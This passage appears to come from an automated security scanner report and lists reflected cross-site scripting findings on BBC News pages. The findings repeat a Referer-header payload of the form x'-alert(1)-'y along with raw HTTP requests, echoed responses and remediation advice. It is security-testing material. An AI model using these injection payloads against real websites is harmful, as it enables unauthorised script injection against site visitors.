Set-Cookie: BBC-UID=041de5c5ae7a263b0f30a7c8619c953d60950a88c020915ab4db4ae541e1face0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:23 GMT; path=/; domain=bbc.co.uk;
Content-Length: 55043

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476203000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=6007c'-alert(1)-'aa5a9db598a',
       section: 'northern-ireland',
       sectionPath: '/Northern Ireland',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12428837',
       assetType: 'story',
       uri:
...[SNIP]...

1.85. http://www.bbc.co.uk/news/uk-politics-12428814 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/uk-politics-12428814

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d4070'-alert(1)-'1fec68ff8b7 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/uk-politics-12428814 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=d4070'-alert(1)-'1fec68ff8b7

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:23 GMT
Keep-Alive: timeout=10, max=787
Expires: Sat, 12 Feb 2011 02:03:23 GMT
Connection: close
Set-Cookie: BBC-UID=841da5052eba964b3bf9406e1196754dc30f62ec6060c1c9eb6be36f5b84620e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:23 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=841da5052eba964b3bf9406e1196754dc30f62ec6060c1c9eb6be36f5b84620e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:23 GMT; path=/; domain=bbc.co.uk;
Content-Length: 63255

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476203000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=d4070'-alert(1)-'1fec68ff8b7',
       section: 'politics',
       sectionPath: '/Politics',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12428814',
       assetType: 'story',
       uri: '/news/uk-politi
...[SNIP]...

1.86. http://www.bbc.co.uk/news/uk-scotland-12433015 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/uk-scotland-12433015

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ae8f6'-alert(1)-'adf5e105baf was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/uk-scotland-12433015 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=ae8f6'-alert(1)-'adf5e105baf

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:24 GMT
Keep-Alive: timeout=10, max=796
Expires: Sat, 12 Feb 2011 02:03:24 GMT
Connection: close
Set-Cookie: BBC-UID=e4bde5657eaad6cc79d586334191a004b2670d2660f091bf122960ec569037d60Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:24 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=e4bde5657eaad6cc79d586334191a004b2670d2660f091bf122960ec569037d60Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:24 GMT; path=/; domain=bbc.co.uk;
Content-Length: 59211

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476204000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=ae8f6'-alert(1)-'adf5e105baf',
       section: 'scotland',
       sectionPath: '/Scotland',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12433015',
       assetType: 'story',
       uri: '/news/uk-scotla
...[SNIP]...

1.87. http://www.bbc.co.uk/news/uk-scotland-tayside-central-12433192 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/uk-scotland-tayside-central-12433192

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ba096'-alert(1)-'7db420ae8d7 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/uk-scotland-tayside-central-12433192 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=ba096'-alert(1)-'7db420ae8d7

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:25 GMT
Keep-Alive: timeout=10, max=756
Expires: Sat, 12 Feb 2011 02:03:25 GMT
Connection: close
Set-Cookie: BBC-UID=443dd5b57e4a86dd6b0a224d51a257759338037a409081faf46baa84f18c62bc0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:25 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=443dd5b57e4a86dd6b0a224d51a257759338037a409081faf46baa84f18c62bc0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:25 GMT; path=/; domain=bbc.co.uk;
Content-Length: 60453

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476205000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=ba096'-alert(1)-'7db420ae8d7',
       section: 'tayside-and-central',
       sectionPath: '/Scotland/Tayside and Central',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12433192',
       assetType: 's
...[SNIP]...

1.88. http://www.bbc.co.uk/news/uk-wales-12427865 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/uk-wales-12427865

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb76d'-alert(1)-'781c170215e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/uk-wales-12427865 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=cb76d'-alert(1)-'781c170215e

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:27 GMT
Keep-Alive: timeout=10, max=790
Expires: Sat, 12 Feb 2011 02:03:27 GMT
Connection: close
Set-Cookie: BBC-UID=94ad65c5ee3af6ffba362eb2e17681f2c4f94a9880f0815a44ab5ac5ed6006840Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:27 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=94ad65c5ee3af6ffba362eb2e17681f2c4f94a9880f0815a44ab5ac5ed6006840Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:27 GMT; path=/; domain=bbc.co.uk;
Content-Length: 58859

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476207000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=cb76d'-alert(1)-'781c170215e',
       section: 'wales',
       sectionPath: '/Wales',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12427865',
       assetType: 'story',
       uri: '/news/uk-wales-124278
...[SNIP]...

1.89. http://www.bbc.co.uk/news/uk-wales-12433322 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/uk-wales-12433322

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 76224'-alert(1)-'111f098e998 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/uk-wales-12433322 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=76224'-alert(1)-'111f098e998

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:27 GMT
Keep-Alive: timeout=10, max=797
Expires: Sat, 12 Feb 2011 02:03:27 GMT
Connection: close
Set-Cookie: BBC-UID=a41dc5259eca66afea33e621b10bd5ee0d9dbaccf0a0b1e9bb2b938ee86d539a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:27 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=a41dc5259eca66afea33e621b10bd5ee0d9dbaccf0a0b1e9bb2b938ee86d539a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:27 GMT; path=/; domain=bbc.co.uk;
Content-Length: 60267

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476207000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=76224'-alert(1)-'111f098e998',
       section: 'wales',
       sectionPath: '/Wales',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12433322',
       assetType: 'story',
       uri: '/news/uk-wales-124333
...[SNIP]...

1.90. http://www.bbc.co.uk/news/world-12428938 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-12428938

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 27b47'-alert(1)-'dd1de994a93 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/world-12428938 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=27b47'-alert(1)-'dd1de994a93

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:27 GMT
Keep-Alive: timeout=10, max=771
Expires: Sat, 12 Feb 2011 02:03:27 GMT
Connection: close
Set-Cookie: BBC-UID=442d75351eca26df590d6a4ee164a2e09ac1ec92f0a0f1aa049b7a74622c8bba0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:27 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=442d75351eca26df590d6a4ee164a2e09ac1ec92f0a0f1aa049b7a74622c8bba0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:27 GMT; path=/; domain=bbc.co.uk;
Content-Length: 48627

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476207000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=27b47'-alert(1)-'dd1de994a93',
       section: 'world',
       sectionPath: '/World',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12428938',
       assetType: 'photo_gallery',
       uri: '/news/world-1
...[SNIP]...

1.91. http://www.bbc.co.uk/news/world-middle-east-12435798 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-middle-east-12435798

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b0ffe'-alert(1)-'8cabc5ac833 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/world-middle-east-12435798 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=b0ffe'-alert(1)-'8cabc5ac833

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:51 GMT
Keep-Alive: timeout=10, max=796
Expires: Sat, 12 Feb 2011 02:03:51 GMT
Connection: close
Set-Cookie: BBC-UID=d4bd85e5ceea98d7eaae182dd18380aa211c933280e0b1493bdb834ec06ee49c0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:51 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=d4bd85e5ceea98d7eaae182dd18380aa211c933280e0b1493bdb834ec06ee49c0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:51 GMT; path=/; domain=bbc.co.uk;
Content-Length: 72129

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476231000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=b0ffe'-alert(1)-'8cabc5ac833',
       section: 'middle-east',
       sectionPath: '/World/Middle East',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12435798',
       assetType: 'story',
       uri: '/ne
...[SNIP]...

1.92. http://www.bbc.co.uk/news/world-middle-east-12437440 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-middle-east-12437440

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d69be'-alert(1)-'cdb51ad3ad9 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/world-middle-east-12437440 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=d69be'-alert(1)-'cdb51ad3ad9

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:48 GMT
Keep-Alive: timeout=10, max=800
Expires: Sat, 12 Feb 2011 02:03:48 GMT
Connection: close
Set-Cookie: BBC-UID=042d2575ee3a58d4dbcc933a311e4b35fe26282a40b05149cb4b92cdb4bf510e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:48 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=042d2575ee3a58d4dbcc933a311e4b35fe26282a40b05149cb4b92cdb4bf510e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:48 GMT; path=/; domain=bbc.co.uk;
Content-Length: 61232

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476228000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=d69be'-alert(1)-'cdb51ad3ad9',
       section: 'middle-east',
       sectionPath: '/World/Middle East',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12437440',
       assetType: 'media_asset',
       uri
...[SNIP]...

1.93. http://www.bbc.co.uk/news/world-middle-east-12437881 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-middle-east-12437881

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3584c'-alert(1)-'5096f56773c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/world-middle-east-12437881 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=3584c'-alert(1)-'5096f56773c

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:49 GMT
Keep-Alive: timeout=10, max=788
Expires: Sat, 12 Feb 2011 02:03:49 GMT
Connection: close
Set-Cookie: BBC-UID=442d25358e3a3895a9a901ba31e8b7c3332d9998406051398b5b7334e1e4fabe0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:49 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=442d25358e3a3895a9a901ba31e8b7c3332d9998406051398b5b7334e1e4fabe0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:49 GMT; path=/; domain=bbc.co.uk;
Content-Length: 61398

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476229000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=3584c'-alert(1)-'5096f56773c',
       section: 'middle-east',
       sectionPath: '/World/Middle East',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12437881',
       assetType: 'media_asset',
       uri
...[SNIP]...

1.94. http://www.bbc.co.uk/news/world-middle-east-12437912 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-middle-east-12437912

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7bcda'-alert(1)-'a13dd14ffdc was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/world-middle-east-12437912 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=7bcda'-alert(1)-'a13dd14ffdc

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:49 GMT
Keep-Alive: timeout=10, max=715
Expires: Sat, 12 Feb 2011 02:03:49 GMT
Connection: close
Set-Cookie: BBC-UID=049dc5a5eebaa8656b3c138f816fe03414f6863b90501109fb1bc26da4bfd1fe0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:49 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=049dc5a5eebaa8656b3c138f816fe03414f6863b90501109fb1bc26da4bfd1fe0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:49 GMT; path=/; domain=bbc.co.uk;
Content-Length: 61338

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476229000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=7bcda'-alert(1)-'a13dd14ffdc',
       section: 'middle-east',
       sectionPath: '/World/Middle East',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12437912',
       assetType: 'media_asset',
       uri
...[SNIP]...

1.95. http://www.bbc.co.uk/news/world-middle-east-12437922 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-middle-east-12437922

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 43865'-alert(1)-'eab3b7e3aa4 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/world-middle-east-12437922 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
